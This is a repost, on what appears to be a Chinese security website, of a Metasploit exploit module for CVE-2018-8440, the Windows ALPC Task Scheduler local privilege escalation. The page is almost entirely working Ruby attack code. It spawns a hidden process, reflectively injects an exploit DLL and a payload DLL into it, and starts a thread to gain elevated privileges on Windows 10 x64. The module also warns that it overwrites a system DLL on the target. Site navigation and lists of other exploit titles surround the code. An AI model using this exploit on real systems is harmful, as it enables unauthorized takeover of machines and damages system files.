首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
来源:metasploit.com 作者:asoto-r7 发布时间:2018-09-25  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'         #TODO: Do we need this?
require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',
      'Description'    => %q(
        On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented
        by the task scheduler service can be used to write arbitrary DACLs to `.job` files located
        in `c:\windows\tasks` because the scheduler does not use impersonation when checking this
        location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be
        created to a file the user has read access to. After creating a hardlink, the vulnerability
        can be triggered to set the DACL on the linked file.

        WARNING:
        The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
        will be overwritten when the exploit runs.

        This module has been tested against Windows 10 Pro x64.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'SandboxEscaper',       # Original discovery and PoC
          'bwatters-r7',          # msf module
          'asoto-r7',             # msf module
          'Jacob Robles'          # msf module
        ],
      'Platform'       => 'win',
      'SessionTypes'   => ['meterpreter'],
      'Targets'        =>
        [
          ['Windows 10 x64', { 'Arch' => ARCH_X64 }]
        ],
      'References'     =>
        [
          ['CVE', '2018-8440'],
          ['URL', 'https://github.com/SandboxEscaper/randomrepo/'],
        ],
      'DisclosureDate' => 'Aug 27 2018',
      'DefaultTarget'  => 0,
    ))

    register_options([OptString.new('PROCESS',
        [false, 'Name of process to spawn and inject dll into.', nil])
    ])
  end

  def setup_process(process_name)
    begin
      print_status("Launching #{process_name} to host the exploit...")
      launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)
      process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Sandboxes could not allow to create a new process
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_error('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end
    process
  end

  def inject_magic(process, payload_dll)
    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll')
    library_path = ::File.expand_path(library_path)
    dll_data = ''
    ::File.open(library_path, 'rb') { |f| dll_data = f.read }

    print_status("Writing payload dll into process #{process.pid} memory")
    payload_addr = process.memory.allocate(payload_dll.length, PROT_READ | PROT_WRITE)
    written = process.memory.write(payload_addr, payload_dll)

    if written != payload_dll.length
      fail_with(Failure::UnexpectedReply, 'Failed to write payload to process memory')
    end

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    exploit_mem, offset = inject_dll_data_into_process(process, dll_data)
    process.thread.create(exploit_mem + offset, payload_addr)
  end

  def validate_active_host
    sysinfo['Computer']
    true
  rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    false
  end

  def validate_target
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo['Architecture'] == ARCH_X86
      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
    end

    if sysinfo['OS'] =~ /XP/
      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
    end
  end

  def exploit
    unless session.type == 'meterpreter'
      fail_with(Failure::None, 'Only meterpreter sessions are supported')
    end

    payload_dll = generate_payload_dll
    process_name = datastore['PROCESS'] || 'notepad.exe'

    print_status('Checking target...')
    unless validate_active_host
      raise Msf::Exploit::Failed, 'Could not connect to session'
    end
    validate_target

    print_status("Target Looks Good... trying to start #{process_name}")
    process = setup_process(process_name)
    inject_magic(process, payload_dll)
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  rescue Rex::Post::Meterpreter::RequestError => e
    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    print_error(e.message)
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Beyond Remote 2.2.5.3 - Denial
·Solaris EXTREMEPARR dtappgathe
·SoftX FTP Client 3.3 - Denial
·Easy PhoroResQ 1.0 - Buffer Ov
·Termite 3.4 - Denial of Servic
·Faleemi Desktop Software 1.8.2
·Joomla! Component AMGallery 1.
·WebKit - 'WebCore::SVGAnimateE
·udisks2 2.8.0 - Denial of Serv
·WebKit - 'WebCore::AXObjectCac
·LG SuperSign EZ CMS 2.5 - Remo
·WebKit - 'WebCore::Node::ensur
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved